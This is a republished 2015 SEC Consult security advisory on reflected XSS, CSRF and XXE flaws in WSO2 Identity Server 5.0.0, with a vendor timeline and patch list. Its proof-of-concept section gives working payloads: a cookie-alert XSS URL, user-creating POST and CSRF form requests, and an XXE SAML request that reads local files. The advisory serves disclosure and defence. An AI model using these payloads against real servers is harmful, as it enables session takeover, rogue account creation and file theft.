SEC Consult SA-20150513-0 :: Multiple critical vulnerabilities in WSO2 Identity Server

Type securityvulns
Reporter Securityvulns
Modified 2015-05-18T00:00:00



SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >

          title: Multiple critical vulnerabilities
        product: WSO2 Identity Server
                 other WSO2 Carbon based products may be affected too

vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095) fixed version: 5.0.0 with patches 1194 and 1095 applied CVE number: impact: critical homepage: found: 2015-02-19 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab

                 An integrated part of SEC Consult
                 Berlin - Frankfurt/Main - Montreal - Singapore
                 Vienna &#40;HQ&#41; - Vilnius - Zurich



Vendor description:

"WSO2 Identity Server provides sophisticated security and identity management of enterprise web applications, services, and APIs, and makes life easier for developers and architects with its hassle-free, minimal monitoring and maintenance requirements. In its latest version, Identity Server acts as an Enterprise Identity Bus (EIB) — a central backbone to connect and manage multiple identities regardless of the standards on which they are based."


Business recommendation:

The WSO2 Identity Server has three security vulnerabilities that allow an attacker to take over administrative user sessions and read arbitrary local files. Moreover, the XXE vulnerability potentially allows an attacker to conduct further attacks on internal servers since the vulnerability may allow an attacker to bypass firewall rules.

SEC Consult only conducted a very quick and narrow check on the WSO2 Identity Server. Since in this check a critical vulnerability was found, SEC Consult suspects that the Identity Server contains even more critical vulnerabilities.

Since other WSO2 products are based on the same framework (WSO2 Carbon Framework), it is possible that these or similar vulnerabilities affect other products too.

SEC Consult recommends to not use any products based on the WSO2 Carbon Framework until a thorough security review has been conducted.

Vulnerability overview/description:

1) Reflected cross-site scripting (XSS, IDENTITY-3280) The WSO2 Identity Server is vulnerable to reflected reflected cross-site scripting vulnerabilities. An attacker can lure a victim, that is logged in on the Identity Server administration web interface, to e.g. click on a link and take over the victim's session.

2) Cross-site request forgery (CSRF, IDENTITY-3280) On at least on one web page, CSRF protection has not been implemented. An attacker on the internet could lure a victim, that is logged in on the Identity Server administration web interface, on a web page e.g. containing a manipulated <img> tag. The attacker is then able to add arbitrary users to the Identity Server.

3) XML external entitiy injection (XXE, IDENTITY-3192) An unauthenticated attacker can use the SAML authentication interface to inject arbitrary external XML entities. This allows an attacker to read arbitrary local files. Moreover, since the XML entity resolver allows remote URLs, this vulnerability may allow to bypass firewall rules and conduct further attacks on internal hosts.

Proof of concept:

1) Reflected cross-site scripting (XSS, IDENTITY-3280) When opening the following URL an alert-box is shown as an example: http://<host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

When a user without permission to create other users issues the following request, an alert-box is shown: - ---- snip ---- POST /carbon/user/add-finish.jsp HTTP/1.1 Host: <host>:9443 Cookie: <cookies> Content-Type: application/x-www-form-urlencoded Content-Length: 261

pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123 - ---- snip ----

2) Cross-site request forgery (CSRF, IDENTITY-3280) The following HTML fragment demonstrates this issue: - ---- snip ---- <form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp"> <input type="text" name="domain" value="PRIMARY"/> <input type="text" name="username" value="secconsult"/> <input type="text" name="password" value="test123"/> <input type="submit"/> </form> - ---- snip ----

3) XML external entitiy injection (XXE, IDENTITY-3192) After issuing the following request to a vulnerable Windows server, the contents of the C: drive are returned:

  • ---- snip ---- <?xml version="1.0"?> <!DOCTYPE AuthnRequest [ <!ELEMENT AuthnRequest ANY > <!ENTITY xxe SYSTEM "file:///C:/" >]> <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://<host>/samlsso" ID="_ffffffff-0000-0000-0000-ffffffffffff" IssueInstant="2015-01-01T01:01:01Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0"> <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> XXXX&xxe;YYYY </saml:Issuer> <samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/> </samlp:AuthnRequest>
  • ---- snip ----

Vulnerable / tested versions:

The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied) was found to be vulnerable. This was the latest version at the time of discovery.

Vendor contact timeline:

2015-03-19: Contacting vendor through 2015-03-19: Security contact confirms retrieval of the E-Mail 2015-03-19: Security contact says that he has trouble opening the attached PDF document 2015-03-19: Sending Responsible Disclosure Policy in plain text 2015-03-20: Security contact states he actually was unable to decrypt the advisory 2015-03-22: Sending security advisory again 2015-03-22: Security contact confirms retrieval of the advisory 2015-03-26: Security contact acknowledges existence of the vulnerabilities 2015-04-10: Asking for an update on the current status and which products and versions are affected 2015-04-10: Security contact: XSS vulnerabilities are fixed in the code, fixing CSRF is in progress, Identity Server 5.0.0 is vulnerable 2015-04-13: Asking whether the patches will be release before the latest possible release date; asking for the status of the XXE vulnerability and whether other products based on Carbon are affected 2015-04-13: Advisory can be release on 2013-05-07, release notes will mention the affected products 2015-05-04: Asking for current status 2015-05-04: Security contact: patches will be released in the next couple of days 2015-05-05: Security contact asks to delay the release of the advisory to 2013-05-13 2015-05-05: Confirming the new release date 2015-05-05: Asking to give credit in the release notes to the patch 2015-05-13: Public release of the advisory


Apply the following patches to mitigate these issues: * WSO2-CARBON-PATCH-4.2.0-1194 * WSO2-CARBON-PATCH-4.2.0-1095

See the following pages for more information:

The patches can be downloaded at



Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com Web: Blog: Twitter:

EOF W. Ettlinger / @2015 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32)

iQIcBAEBAgAGBQJVUx2MAAoJEC0t17XG7og/H/4QAIiwOLbldpFKkJwemTc5qxeu LSIgJjMy9Yz7HZtu1c65QAPJQ6B+VduU+bN3Lt10AHAWYPTtyjFlQzq4MrcUWaY8 XiO4pA4nYykki9F8QUp1cBX9bfzihqHR/1+sqELJ/ueiz8U4wzUPW31UehTdjV26 d+SZ0FdVPi1BlJb3Ex0ejkxkDB4a9kVYswxu0zti8oZcaXZ++TYdCssssAaA+Vu4 aPErIQMfaXSoeZlJS7f8TYRRR9p2fVJBsXr29CgG9GJBz0DMExF8AKZ+Ve0EJd8u y2mKPwJgtzLN7Crw1YfD6YoSaTbygdDqFs208VDwAEP5Gh7N19ylhpUdJkgKk56l jzo+DmqVt9j5R2gu1Nc8+3ienuQ9v6xs5WlOWJC5/2Gh9ngOH31jEZTG2oqjLDxW pqsXnqG6FEW1qbbB+UCebI3bseqLGJJQQVqYeENh9zX1m82PTuRy9QQDcyXlzl4q hZksURglFjGwwgahTgR8LVO5kAivqbsahp/IojxSwc0DnceC8NJjYE/qprv+NOG0 2sud3X9AhrlJcwfNMWb795Jgv2fDjox1yu8Noga67a2muz9UwbTJXZKSyn32IpEe aYQtgSXTT0YaidP7HDUcsuTIhGczL8PGilDCuNRDy2UF0eFHqaj1d9Ou9QSturnn wu/AhxURurrsfOEg1TMs =iuLH -----END PGP SIGNATURE-----